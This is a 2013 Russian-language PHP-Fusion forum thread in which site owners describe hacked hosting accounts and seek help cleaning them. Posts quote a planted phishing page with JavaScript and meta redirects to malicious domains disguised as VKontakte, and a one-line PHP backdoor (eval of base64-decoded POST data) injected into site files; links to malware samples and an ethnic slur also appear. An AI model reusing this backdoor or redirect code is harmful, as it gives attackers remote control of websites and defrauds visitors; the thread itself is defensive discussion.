Забыли пароль?
Запросите новый здесь.

Автор темы: Alex
ID темы: 1343
Информация:
Тема содержит 43 сообщения, была просмотрена 29675 раз.
Просмотр темы
PHP-Fusion Russia » Поддержка 7 версии » Безопасность
 Распечатать тему
в корне всех сайтов появился wp-conf.php
Rush
ну если это log404, то на сервере они ничего не делают, т.к. их там нет
 
Web
Alex
судя по айпи загрузили из киева

хохлы шалят
x1
 
Web
Zaxap
Сразу в голове возник наш старый добрый Воваab
Как он мог так поступить??? ag
Зло не дремлет, а я добрый...
 
Polarfox
Zaxap, у тя память хреновая чтоле, это фаел лога моей странички 404, по нормальному на него еще можно защиту поставить через ассесс, можешь удалять если страницей не пользуешься.
Всегда делайте backup перед изменениями | Указывайте свою версию в подписи/профиле. | Вся бесплатная тех. поддержка только на форуме
 
Zaxap
А откуда там ip? Я тоже так думал, но потом, после просмотра содержимого, усомнился) Ок. Ваше, так ваше, спорить не буду ad
Зло не дремлет, а я добрый...
 
Rush
сервер в украине купить может абсолютно любой человек. надо написать хостеру
 
Web
Vova
Zaxap написал:

Сразу в голове возник наш старый добрый Воваab
Как он мог так поступить??? ag


Я?

в корне всех сайтов появился wp-conf.php и 5-7 файлов w(набор цифр)n.php

на хостинге 10 сайтов на фьюжене, 1 ворд пресс, 1 джумла

может быть кто знает через что он проникает и размножается по всему аккаунту


Отследи.
 
Web
Alex
2.5 часа назад на хосте появилась папка pl в ней один файл index.php
с таким содержанием

Скачать исходники  Код
<html>


<head>

<script type="text/javascript">
<!--
if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){
  window.location = "http://filenx.com/gdz/u/7798/gdz.auto";
}
//-->
</script>

<script language="JavaScript"> parent.window.opener.location="http://any_symbols.14.portif.ru/?itd30sah=Zkxvf19rZD2zNBcwLmNtZGW9d1FsZmdlbXTyZlpscHFrY2mC%3D";</script>

<meta http-equiv="refresh" content="0;URL=http://any_symbols.14.reskol.ru/?zp29k=jeLVlPHRj5MJ2biOxc3Xj8sHiOfIksjViMFb4">

  <title>Вконтакте</title>


</head>


<body onload="tim()">


<br>


<body>


</body>


</html>


 
Web
Vova
Експлоит. Ищи в скрипте где можна сделать експлоит.
 
Web
Polarfox
Обычное явление


Alex, не зачистил двиг значит.
Всегда делайте backup перед изменениями | Указывайте свою версию в подписи/профиле. | Вся бесплатная тех. поддержка только на форуме
 
Alex
на одном сайте появился уже знакомый нам файл wp-conf.php скачал и запаковал в архив,
Изменил(а) Alex, 26.02.2013 19:17
 
Web
Vova
Логи поставь и отлогируй. Даже можеш временно написать скрипт и подключить его при загрузке страницы. Он точно спалиться.
 
Web
dark
Alex написал:

на одном сайте появился уже знакомый нам файл wp-conf.php скачал и запаковал в архив,

В АРХИВЕ ВИРУС!!!
http://rapid.ufanet.ru/7701002


Походу у тебя антивирусник его "запилил" на стадии заливки: Файл wp-conf.zip (22 Байт)

Запакуй еще раз с паролем, что бы онлайн сервисы так же не могли его просканировать.
 
Alex
вирус http://rapid.ufanet.ru/4309571 с другого компа, каспер даже не пикнул зараза
 
Web
dark
Это не вирус, это тот самый файловый менеджер, фотки которого выкладывались в соседней теме.

P.S. Ищи по логам с какого ip его залили и запрашивали. К примеру поиском wp-conf.php в логах, если конечно на этом же сервере нету вордпресса. Это немного усложнит задачу.
 
back1919
Черт, вы прям глаза на мир открыли. Когда-то давно сайты подцепили на украинском хостинге какую-то ерунду, антивирусом чистил, фтп менял. 1 в 1 -такие же сейчас wp файлы нашел. http://rusfolder.com/35209168
 
Web
back1919
Слушайте, вообще беда, на другом хостинге таже хрень нашлась, но на этот раз положила сайт, все файл php с дрянью в 1-й строчке - как предотвратить на будущее эту напасть?

Вот такая строчка везде)
if(@$_POST['test']){eval(base64_decode($_POST['test'])); exit();}php if(@$_POST['test']){eval(base64_decode($_POST['test'])); exit();}
Изменил(а) back1919, 26.02.2013 20:17
Правда и отзывы сотрудников о работодателях.
 
Web
alastor
тоже заметил эту хрень на сайте... на бегете даже больше половины файлов снесли. хотя они говорят что они ничего не удаляли.. странно.
Так чем лечится? Файлы удалил эти. пароли сменил. кстати, изменений по да дате не было никаких на системных файлах. только новые были добавлены.
 
Vova
Атакуют бегет. У себя пока что ничего не наблюдал такого.
 
Web
Pisatel
Господа, то, что вы удаляете файлы и закрываете уязвимость может ничего не дать. Сам троян может лежать в бд, которую тоже нужно чистить. В общем, вот примерно так делать: нашли шелл. Закрыли уязвимость. Далее выясняем ДАТУ появления шелла, восстанавливаем бд ДО этой даты, иначе- лопатить бд вручную и искать троян там.
 
Web

Поделиться этой темой
Социальные закладки: Vkontakte Odnoklassniki Mail.ru Facebook Google Tweet This
URL:
BBcode:
HTML:

Перейти на форум:
Похожие темы
Темы Форум Ответов / Просмотров Последние сообщения
Услуги разработки сайтов, графического дизайна и программирования  →  Реклама на портале 0 / 649 03.12.2023 02:49
Флешка перестала определяться на всех устройствах  →  Разное 1 / 1890 22.02.2022 04:45
Как определить необходимые мощности хостинга для группы сайтов с определённой посещалкой?  →  Хостинг 0 / 3092 20.02.2019 20:46
Есть ли готовые плагины для сайтов по недвижимости и, автодилера и пр?  →  Пожелания и предложения 0 / 1686 10.11.2018 17:41
Ваш топ 5 список ежедневных сайтов  →  Флуд 16 / 7717 07.10.2018 10:58
Кто столько сайтов сделал?  →  Флуд 13 / 3221 21.01.2018 07:11
Как правильно загрузить свой шрифт в css для всех браузеров?  →  Темы оформления 7 версии 12 / 23213 04.08.2017 10:06
Сколково Телеком - качественный хостинг сайтов на SSD дисках  →  Хостинг 7 / 12707 22.12.2016 17:00
Показ всех категорий статей  →  Моды 2 / 2746 11.09.2016 15:44
Как сделать разное мето описание на всех странциах?  →  Вопросы новичков 25 / 36846 27.10.2015 22:32
Топ 5 пользователей форума
Zaxap Zaxap (1,090)   Vova Vova (877)   Pisatel Pisatel (678)   util util (666)   SchreiBear SchreiBear (625)